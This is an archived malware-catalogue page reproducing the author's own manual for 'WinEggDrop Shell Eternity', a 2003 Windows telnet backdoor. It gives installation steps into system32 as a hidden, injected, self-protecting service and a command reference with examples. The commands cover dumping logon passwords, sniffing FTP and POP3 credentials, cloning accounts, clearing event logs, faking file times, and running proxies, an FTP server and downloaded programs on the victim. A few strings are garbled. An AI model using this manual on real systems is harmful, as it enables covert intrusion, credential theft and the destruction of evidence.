WinEggDrop Shell Eternity

Released 21 years, 3 months ago. November 2003

Copyright © MegaSecurity

By WinEggDrop

WinEggDrop Shell Eternity
From China
Author WinEggDrop
Family WinEggDrop Shell
Category Remote Access
Version WinEggDrop Shell Eternity
Released Date Nov 2003, 21 years, 3 months ago.

Author Information / Description
WinEggDrop Shell Eternity Version

Backdoor Class: A telnetd backdoor(only work on NT system)

Advance(Compare to the same class backdoor)
1.Competitively Small.Even the server is near 80k after compression,it's still "small" 
  comparing to its features and to the similar backdoor
2.Many many features(some are unique)
A.Process Management-->view and kill processes(abile to kill process by PID or ProcessName)
B.Registry Management(delete,set,add,view Key or keyname)
C.Service management(stop,start,enum,config and delete service)
D.TCP/IP Process to Port Mapper(similar to fport.exe)
E.Reboot,showdown,poweroff and logoff
F.Sniffing(able to sniff ftp or pop3 password)
G.install terminal service on win 2k server system
H.Multi-thread port redirector(able to specify connection IP Range)
I.Multi-thread HTTPD(able to specify connection IP Range)
J.Sock5 Proxy(Two different auth methods,able to specify connection IP Range)
K.Clone system accounts,and check Cloned accounts
L.Findpassword(able to view all logon account's password on NT 4.0 or Win 2K,even cloned accounts)
M.TCP/IP Filtering
N.FTP basic client with unique features(resume supported,search files in ftp server,mass get,mass del,mass send and so more)
O.FTP server(use only two ports,resume supported)
P.HTTP Proxy(Full Anonymous,Support oicq,icq,msn,mirc and so more applications supporting http proxy)
Q.other features such as http downloader(resume supported),clear logs,get system info,restore common file associations
  ,enumerate system accounts and so more
3.Online help with examles(which means you can get help as you connect to the backdoor,such as you know there is command named
  ftpserver,but you forget the syntax,so you can just enter ftpserver as you connect to the backdoor,and the syntax and example
  will be shown)
4.No process shown on the task management because the backdoor is injected into other process for running
5.Self-protection(protect the service and the injector being deleted and modified)

Eternity Version
1.Add FTP Server
2.Add check cloned account
3.Add search file,mass get,mass send,mass del in ftp basic client
4.Add HTTP Proxy
5.Sock5 proxy,sniff,http proxy and ftp server is able to run as backdoor is loaded
6.Add feature to show the system default languate
7.Modify some code on sock5 proxy
8.No new service is added as installing terminal service
9.Fix Fport code
10.Tons of mini modifications in the code

Eternity Version All Features(Commands)
1.Pslist                                   Feature:List processes
2.ListIP                                   Feature:List all IPs
3.ShowSID                                  Feature:List accounts' SID
4.Fport                                    Feature:TCP/IP Process to Port Mapper
5.Online                                   Feature:List all IPs connected to the backdoor
6.WhoIsShell                               Feature:List the IP which has got the shell
7.ShowName                                 Feature:List account by registry
8.Reboot                                   Feature:Reboot
9.ShutDown                                 Feature:ShutDown
10.Logoff                                  Feature:Logoff
11.PowerOff                                Feature:Poweroff
12.Shell                                   Feature:Get a shell
13.Stopbackdoor                            Feature:Stop The BackDoor,but you are unable to delete the backdoor's dll file
14.pskill                                  Feature:Kill process
15.Never                                   Feature:Set an account's logon time to zero
16.DirFile                                 Feature:List all files in current directory
17.DelFile                                 Feature:Delete a file
18.Execute                                 Feature:Execute a program
19.Http://IP/�ļ�                          Feature:Download file
20.Installterm                             Feature:Install terminal service
21.Clone                                   Feature:Clone an account
22.Send                                    Feature:Send message to the buddies who also connect to the backdoor
23.Exit                                    Feature:Quit the backdoor
24.OffShell                                Feature:Kick the one who has got the shell
25.Help                                    Feature:Show help
26.Disconnect                              Feature:Disconnect other connector
27.StopService                             Feature:Stop a service
28.StartService                            Feature:Start a service
29.DeleteService                           Feature:Delete a service
30.CleanEvent                              Feature:Clean logs
31.TerminalPort                            Feature:view or set terminal service port
32.Redirect                                Feature:Port redirector
33.ViewThreads                             Feature:View Port redirector information
34.KillThreads                             Feature:Kill one port redirector thread
35.EnableFilter                            Feature:Enable TCP/IP filtering
36.DisableFilter                           Feature:Disable TCP/IP filtering
37.FilterInfo                              Feature:View TCP/IP filtering status
38.AR                                      Feature:Restore common file association
39.GetUser                                 Feature:List all system accounts
40.ViewPath                                Feature:View current path
41.SetPath                                 Feature:Set current path
42.SID                                     Feature:View local or remote system's SID
43.ViewTimeOut                             Feature:View timeout 
44.SetTimeOut                              Feature:Set timeout
45.StartSniffer                            Feature:Start sniffing
46.StopSniffer                             Feature:Stop sniffing
47.ViewSniffer                             Feature:View sniffing status
48.Sysinfo                                 Feature:View system information
49.ViewService                             Feature:Query a service's information
50.ConfigService                           Feature:Config a service start type
51.ViewKey                                 Feature:View run and runservics startup keys in registry
52.DelKey                                  Feature:Delete a key from run and runservices in registry
53.EnumService                             Feature:Enumerate all services information matching the start type as auto
54.RegEedit                                Feature:Enter registry management mode
55.Findpassword                            Feature:Retrieve all logon account's password
56.ExitShell                               Feature:Return from shell mode to pre-shell mode
57.StartProxy                              Feature:Start sock5 proxy
58.StopProxy                               Feature:Stop sock5 proxy
59.ViewProxyInfo                           Feature:View sock5 proxy information
60.HTTPServer                              Feature:start httpd 
61.KillHttpServer                          Feature:Kill one of httpd thread
62.ViewHTTPInfo                            Feature:View httpd information
63.Filter                                  Feature:Enter TCP/IP filtering mode
64 FTP                                     Feature:Enter FTP client mode
65.ViewFTPInfo                             Feature:View FTP client thread information
66.FTPServer                               Feature:Start ftp server
67.DeleteFTPSetting                        Feature:Delete ftp server settings
68.DeleteProxySetting                      Feature:Delete sock5 proxy settings
69.DeleteSnifferSetting                    Feature:Delete sniffing settings
70.FileTime                                Feature:Modify file time
71.KillFTPD                                Feature:Kill a connection from ftp server
72.CheckClone                              Feature:Check cloned accounts
73.StartHTTPProxy                          Feature:Start HTTP Proxy
74.ViewHTTPProxyInfo                       Feature:View HTTP Proxy Info
75.StopHTTPProxy                           Feature:Stop HTTP Proxy
76.DeleteHTTPProxySetting                  Feature:Delete HTTP Proxy Settings
77.Shield                                  Feature:Start The Backdoor's self-protection
78.UnShield                                Feature:Stop The Backdoor's self-protection
79.ViewFile                                Feature:View Ascii File Content

How to run the backdoor
1.configure injectt.exe
2.upload injectt.exe and TBack.DLL to winnt\system32 "injectt.exe -run" to install the backdoor as service and start the backdoor

The below commands is used when you already connect to the backdoor,pass the authorization 
and  you are in rre-shell mode(when you see [Melody],here is the pre-shell mode)
Eternity Version all Commands' syntax
1.Pslist                                   Feature:List processes

2.ListIP                                   Feature:List all IPs

3.ShowSID                                  Feature:List accounts' SID

4.ShowName                                 Feature:List account by registry

5.Fport                                    Feature:TCP/IP Process to Port Mapper
Notice: The system running hxdef V0.84 with this backdoor's port hidden will affect this feature.Thus,you'd beeter use
mport or fport to replace this feature.Since the side effect of hxdef causes this problem,it's not a bug of
the backdoor at all.Fortunately,the failure of this feature won't crash the backdoor.

6.Online                                   Feature:List all IPs connected to the backdoor

7.WhoIsShell                               Feature:List the IP which has got the shell

8.Reboot                                   Feature:Reboot

9.ShutDown                                 Feature:ShutDown

10.Logoff                                  Feature:Logoff

11.PowerOff                                Feature:Poweroff

12.Shell                                   Feature:Get a shell

13.Stopbackdoor                            Feature:Stop The BackDoor

14.Help                                    Feature:Show help

15.Exit                                    Feature:Quit the backdoor

16.pskill PID or ProcessName               Feature:Kill process
Example:pskill 1234
Example:pskill notepad

17.Never Account                           Feature:Set an account's logon time to zero
Example:Never Guest
Example:Never Administrator

18.DirFile FileName                        Feature:List all files in current directory
Example:DirFile *.exe

19.DelFile FileName                        Feature:Delete a file
Example: DelFile a.txt

20.Execute ProgramToRun                    Feature:Execute a program
Example:Execute abc.exe
Example:Execute net.exe user test test

21.Http://IP/FileName SaveFileName         Feature:Download file
Example: a.exe
Example: a.exe
Example: a.exe

22.Installterm Port                        Feature:Install terminal service
Example:Installterm 3345            

23.Clone Account AccountToClone Password   Feature:Clone an account
Example:Clone Admin Guest test

24.Send All Message                        Feature:Send message to the buddies who also connect to the backdoor
Example:Send all Hello

25.OffShell                                Feature:Kick the one who has got the shell

26.Disconnect                              Feature:Disconnect other connector
Example:Disconnect ThreadNumber            ->Kick someone
Example:Disconnect All                     ->Kick all but you

27.StopService                             Feature:Stop a service
Usage:StopService ServiceName
Example:StopService w3svc                
Example:StoptService windows service

28.StartService                            Feature:Start a service
Usage:StartService ServiceName
Example:StartService w3svc
Example:StartService windows service

29.DeleteService                           Feature:Delete a service
Usage:DeleteService ServiceName
Example:DeleteService Windows Service
Example:DeleteService test

30.CleanEvent                              Feature:Clean logs
Remove Application,Security and System log

31.TerminalPort                            Feature:view terminal service port

31A.TerminalPort                            Feature:set terminal service port
Example:TerminalPort Port

32.Redirect                                Feature:Port redirector
Usage:Redirect SourcePort RemoteHost RemotePort [AllowedIP]
Example:Redirect 2222 3333 
Example:Redirect 2222 3333 12.12.*.*

33.ViewThreads                             Feature:View Port redirector information

34.KillThreads                             Feature:Kill one port redirector thread
Example:KillThreads ThreadNumber

35.EnableFilter                            Feature:Enable TCP/IP filtering

36.DisableFilter                           Feature:Disable TCP/IP filtering

37.FilterInfo                              Feature:View TCP/IP filtering status

38.AR                                      Feature:Restore common file association

39.GetUser                                 Feature:List all system accounts

40.ViewPath                                Feature:View current path

41.SetPath                                 Feature:Set current path
Example:SetPath Ŀ¼

42.SID                                     Feature:View local or remote system's SID
Usage:SID Local|IP
Example:SID Local                          view Local system SID
Example:SID                    View Remote system SID

43.ViewTimeOut                             Feature:View timeout 

44.SetTimeOut                              Feature:Set timeout
Example:SetTimeOut Time(in second)

45.StartSniffer                            Feature:Start sniffing
Usage:StartSniffer NIC
Example:StartSniffer 0
Note:ListIP feature can view all the NIC

46.StopSniffer                             Feature:Stop sniffing

47.ViewSniffer                             Feature:View sniffing status

48.Sysinfo                                 Feature:View system information

49.ViewService                             Feature:Query a service's information
Usage:ViewService ServiceName
Example:ViewService Norton Antivirus Server

50.ConfigService                           Feature:Config a service start type
Usage:ConfigService StartType ServiceName
Example:ConfigService Auto W3svc              -->Set service start type to auto
Example:ConfigService Demand w3svc            -->Set service start type to manual
Example:ConfigService Disable w3svc           -->Set service start type to disable

51.ViewKey                                 Feature:View run and runservics startup keys in registry

52.DelKey                                  Feature:Delete a key from run and runservices in registry
Usage:DelKey KeyName
Example: DelKey radmm
Example: DelKey Tk BellExe

53.EnumService                             Feature:Enumerate all services information matching the start type as auto

54.RegEedit                                Feature:Enter registry management mode
When you enter the regiedit mode,you can use the any commands below:

DirValue                                   Feature:List all current key's value

DirKey                                     Feature:List all current keys

CD..                                       Feature:One level back

Root                                       Feature:Return to the root(hklm)

Exit                                       Feature:Quit regedit mode

Help                                       Feature:Show help

CD KeyName                                 Feature:Switch Keyname

DelValue ValueName                         Feature:Delete a value

DelKey KeyName                             Feature:Delete a Key

Set Type ValueName Value                   Feature:Add a value
Example: set REG_SZ "Test Value" hook.exe

SwitchRoot RootName                        Feature:Switch The Registry Root Key
common branch is the HKLM branch.When you enter the registry management mode,the default branch is set to 
HKLM,so if you want to view or modify registry values other than HKLM branch,you need to use this command
to jump to other branch before processing any operations
Example:SwitchRoot HKCU       --> Jump to HKEY_CURRENT_USER branch,any operations will base on this branch

55.Findpassword                            Feature:Retrieve all logon account's password

56.ExitShell                               Feature:Return from shell mode to pre-shell mode

57.StartProxy                              Feature:Start sock5 proxy
Usage: StartProxy [UserName] [Password] Port AllowedIP
A.[UserName] And [Password] are optional,if they are omitted,then no authorization

Example: StartProxy 12345 All               -->Proxy port is 12345,no authorization and allow all IP to connect
Example: StartProxy Guest test 12345 All    -->Proxy port is 12345,need authorization,and allow all IP to connect
Example: StartProxy 12345 211.11.*.*        -->Proxy port is 12345,no authorization��and IP beginning with 211.11 can connect 
Example: StartProxy Abc abc 12345 12.12.*.* -->Proxy port is 12345,need authorization��and IP beginning with 12.12 can connect

58.StopProxy                               Feature:Stop sock5 proxy
Example: StopProxy

59.ViewProxyInfo                           Feature:View sock5 proxy information

60.HTTPServer                              Feature:start httpd 
Usage:HTTPServer RootDir Port [AllowedIP]
Note:RootDir must exist
Example: HTTPServer C:\ 82                    -->Http server port is 82,RootDir=c:\ allow all IP to connect
Example2: HTTPServer c:\test 100  -->HTTP Server Port is 100,RootDir=c:\test,allow IP to connect
61.KillHttpServer                          Feature:Kill one of httpd thread
Example: KillHttpserver 1

62.ViewHTTPInfo                            Feature:View httpd information

63.Filter                                  Feature:Enter TCP/IP filtering mode
When entering TCP/IP filtering mode,you can use any commands below:

A.Restore                                  Feature:Restore the settings

B.ShowTCP                                  Feature:Show TCP protocol filtering information
Example: ShowTCP

C.ShowUDP                                  Feature:Show UDP protocol filtering information
Example: ShowUDP

D.ShowALL                                  Feature:Show TCP and UDP protocols filtering information
Example: ShowALL

E.ListIP                                   Feature: List all IP and NIC
Example: ListIP

F.EnableFilter                             Feature:Enable TCP/IP filtering
Example: EnableFilter

G.DisableFilter                            Feature:Disable TCP/IP filtering
Example: DisableFilter

H.Exit                                     Feature:Quit TCP/IP filtering mode
Example: Exit

I.SetTTL                                   Feature: Set system TTL value
Usage: SetTTL Number(The number is between 0 and 255)
Example: SetTTL 240

J.Set                                      Feature: Set the filtering port
Usage: Set TCP/UDP PortList ALL/NIC
Example: Set TCP 80;139;445; 0   
Example: Set TCP 12345; 0        
Example: Set TCP 80; All         
Example: Set UDP 135; 0          

K.Add                                      Feature: Add the filtering port
Usage: Add TCP/UDP PortList All/NIC
similar to set command above

64:FTP                                     Feature:Enter FTP client mode
You can use any commands below as you enter FTP client mode

A.Dir [FileName]                           Feature: Display ftp current directory file
  Example:Dir *.exe

B.CD..                                     Feature: One directory up

C.CD Directory                             Feature: Switch Directory
  Example: CD Winnt

D.Root                                     Feature: Return to root Directory
  Example: Root

E.Exit                                     Feature: Quit FTP client mode
  Example: Root

F.Help                                     Feature: Show help
  Example: Help

G:Del FileName                             Feature: Delete File on ftp server
  Example: Del abc.exe

H:RKDir Directory                          Feature: Delete a directory on ftp server
  Example:RKDIR abc

I:MKDIR Directory                          Feature: Create a directory on ftp server
  Example:MKDIR abc

J:REN OldFileName NewFileName              Feature: Rename a file on ftp server
  Example:REN abc.exe bb.exe

K:Get FileName [NewFileName]               Feature: Download a file from ftp server
  Example:Get abc.exe trojan.exe
  Example:Get abc.exe

L:Send FileName [NewFileName]              Feature: Upload a file to ftp server
  Example: Send trojan.exe abc.exe
  Example: Send trojan.exe

M:PD                                      Feature: List current path on ftp server

O:Connect FTPAddress Port User Pass        Feature: Connect to ftp server
  Example:Connect 21 test test

P:Close                                    Feature: Close current ftp session

Q:DirFile [FileName]                       Feature: List current path file on local system(the system running the backdoor)
  Example:DirFile *.exe

R:ViewPath                                 Feature: View current path on local system(the system running the backdoor)

S:SetPath Path                             Feature: Set current path on local system
  Example:SetPath c:\winnt

T:ViewFTPInfo                              Feature: View ftp thread information

U:KillThread                               Feature: Kill a ftp thread 
  Example:KillThread 1

V.ResetFTP                                 Feature: Kill all active ftp thread

W.FTPCommand                               Feature: Send ftp command
  Example:FTPCommand TYPE I
  Example:FTPCommand PASV

AA.MassGet                                 Feature: Mass get files from ftp server
   Example:MassGet *.rm

BB.MassSend                                Feature: Mass send files to ftp server
   Example:MassSend *.exe

CC.MassDel                                 Feature: Mass delete files on ftp server
   Example:MassDel *.exe

DD.FindFile                                Feature: Search files on ftp server
   Example:FindFile *.rm

65.ViewFTPInfo                             Feature:View FTP client thread information

66.FTPServer                               Feature:�������ű����ڽ�FTP����
Usage:FTPServer ControlPort BindPort User Pass RootDir AllowedIP [Access]

arguements meanings:
1.ControlPort -->The listening port of the ftpd
2.BindPort    -->the data connection port using pasv mode(only use the port for Pasv connection).
                 If this port is 0,then the system will automatically allocate a port for it.
3.User        -->User Name for login the ftpd
4.Pass        -->pasword for login the ftpd
5.RootDir     -->the default root directory
6.AllowedIP   -->the IP allowd to connect to the ftpd
7.Access      -->Access String

Access String:
R represents Read Access(download access)
W represents Write Access(upload,rename,move)
L represents List Access(list file)
C represents Create Access(Create Directory on the ftpd)
D represents Delete Access(Delete File/Directory on the ftpd)
U represents Unlock Access(Unlock the user from the root directory,the user can 
                           browse all the files in all hard disks)

Access String is the combination of the above six Access.If the access
arguement is omitted,the user will gain all the accesses

1.ftpserver 21 0 test test c:\win98 all RWLCD
Create a ftpd on port 21,the data connection port is random,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,Write,List,Create,Delete Access.

2.ftpserver 21 9 test test c:\ 12.12.*.*
Crate a ftpd on port 21,the data connection port is random,user name and password are
test,the root directory is c:\,allowed all IP beginning with 12.12 to connect.The connected
user will have all access(Read,Write,List,Create,Delete,Unlock Access)

3.ftpserver 21 55555 test test c:\win98 all
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have all access(Read,Write,List,Create,Delete,Unlock Access).

4.ftpserver 21 55555 test test c:\win98 all LRU
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,List And Unlock Access

5.ftpserver 21 55555 test test c:\win98 all LRW
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,List And Write Access

6.ftpserver 21 55555 test test c:\win98 all LR
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read and List access.

7.ftpserver 21 0 test test c:\win98 all LR 
Create a ftpd on port 21,the data connection port is random allocated by the sytsem,
user name and password are test,the root directory is c:\win98,allows all IP to connect 
this ftpd.The connected user will have Read and List access.

Notes: The Unlock access is the most dangerous access since the login user can browse all the
       disks(floop disk,hard-disk,cd-rom zip disk,and etc).If unnecessary,don't allow this access.

67.DeleteFTPSetting                        Feature:Delete ftp server settings

68.DeleteProxySetting                      Feature:Delete sock5 proxy settings

69.DeleteSnifferSetting                    Feature:Delete sniffing settings

70.FileTime                                Feature:Modify file time
Usage:FileTime SourceFileName DestFileName
Example:FileTime Write.exe abc.exe        

71.KillFTPD                                Feature:Kill a connection from ftp server
Usage:KillFTPD FTPDSessionNumber
Example:KillFTPD 1
Note:FTPDSessionNumber can be retrieved from the command "viewftpserverinfo"

72.CheckClone                              Feature:Check cloned accounts

73.StartHTTPProxy                          Feature:Start HTTP Proxy
Usage:StartHTTPProxy Port [AllowedIP]
Example:StartHTTPProxy 8090
Example:StartHTTProxy 8090 12.12.*.*

74.ViewHTTPProxyInfo                       Feature:View HTTP Proxy Info

75.StopHTTPProxy                           Feature:Stop HTTP Proxy

76.DeleteHTTPProxySetting                  Feature:Delete HTTP Proxy Settings

77.Shield                                  Feature:start The Backdoor 's Self-protection

78.UnShield                                Feature:Stop The Backdoor's Self-protection

79.ViewFile                                Feature:View Ascii File Content
Example:ViewFile FileName

More detail about TCP/IP filtering's two main commmands(Set and Add)
1.Set and Add both can set a list of filtering port for a specified protocol or all protocol,
  and the syntax of both commands is the same,the only difference is set command will overwrite 
  the original setttings,but add command will only append the new settings to the original 
  settings.Whatever using either command,the TCP/IP filtering status must be set to be enable,
  or the command will fail
2.The list of filtering port must have special order-every port must saparate by a comma.
3.The settings will take effort after reboot
4.If the system is running a commercial ftp server such as serv-u or other kinds,don't use 
  the TCP/IP filtering feature,or the ftp server will reject the pasv mode connection.

More detail about some features:
  The command will be used as the user is already in the shell mode,and the command will
  switch the user back to pre-shell mode.The command provides a convenient way to switch
  between pre-shell mode and shell mode.

2.Cmd Redirector
  The feature eases the user to run some system commands in pre-shell mode.

3.Sock5 proxy
  Sock5 proxy supports no auth or auth two different methods.Due to the limitation of 
  intranet,applications with UDP protocol are unlike to use the sock5 proxy unless the
  gateway of the intranet is completely fully NAT.Applications with TCP protocol will not
  be affected

  The feature can act like a basic http server,but don't expect it can support asp,cgi or other
  stuff.This feature only provides users a easy way to create a temporary http server to view or
  download files.The httpd supports resume.To view the files,enter http://IP:port format in IE.If
  you forget to put http:// before the IP,the operation will fail.To enter unicode directory or download
  unicode files,you need to configure a settting in IE.IE->Internet option->Advanced,uncheck "always send 
  URLs as UTF-8(requires restart)" option,then restart IE.

5.TCP/IP Filtering
  The feature provides a way to build a "firewall" on a insecure system,but you must use it properly,or 
  the system may reject all inbound connections,especially don't use this feature when the system is running
  commercial ftp server. 

6.FTP client 
  This feature is indeed a FTP client since it can do more than a standard ftp client but in console
  mode and does not support port mode connection. File transfer(download or upload) can support resume if 
  the ftp server is resumable.Due to the limition of ftp protocol,a ftp session will not receive any commands
  as that ftp session is in file transfer status.For example,if you are downloading files from
  ,and you want to view files on,you must connect to the ftp server one more time.File search
  is only tested on serv-u V4.0,slimftpd V3.14 and the backdoor's build-in ftpd.I don't gurantee it will work on
  other ftp servers.

7.FTP Server
  This is a build-in ftpd,which supports both Pasv and Port modes,supports most basic operations such as 
  delete,create,download,upload,rename,and fxp is also supported. This ftpd is only to ease the user to transfer
  data among computers,so I can't gurantee it will work very well for multi-connection(I know it will work,but I 
  don't have the condition to test it).This ftpd allows 128 connections at most,and the same IP will be restricted
  to login in 5 times at the same time.This ftpd is also designed to support some download utilities like flashget
  and nettransport.The most advanced part of this ftpd is it only use two ports for pasv connection no matter how many
  connections are logged in and perform file transfer(Usually every user will use a new port to bind locally for data 
  transfer in 99% ftpd).This design will allow this ftpd to run under some sort of firewalls or routers.Only if the 
  control port and the data port are allowed for inbound connections,users will have no problem to login in this 
  ftpd even it's behide firewall or router using pasv mode connection.If you set the data port to 0,then the system will 
  allocate a port for the ftpd as data transfer is taking place.
Notes: If the box running this ftp server has no firewall,port filtering or something similiar,I recommend using 0 as the
       bind port

8.Some features run as the backdoor is loaded
  Sock5 proxy,HTTP Proxy,FTPD and sniffing features are the only featurs that can run as the backdoor is loaded.
  Every time you use one of these feature,the setting will be saved,and if the system is restarted,the backdoor
  will start the features according to the setting.For example,if you login the backdoor and use the command
  "startproxy test test 12345",and if the sock5 proxy is successfully created,the setting will be saved,and 
  when the system is rebooted,the backdoor will create the sock5 proxy as it's loaded.If you don't want the backdoor
  to start the feature,you can just simply use the corresponding command to delete the setting.

1.Thanks for the coder of findpassword.I have no idea who coded it,but the findpassword feature in my backdoor is 
  based on his/her code.
2.I coded clone account and install terminal service features based on some others' research(unknown researchers,so I don't 
  know who should take this credit)
3.Fport feature is based on many people source code,and I did modify or re-write it three times.It's pretty stable in this
  version.Thanks for those releasing the source code.


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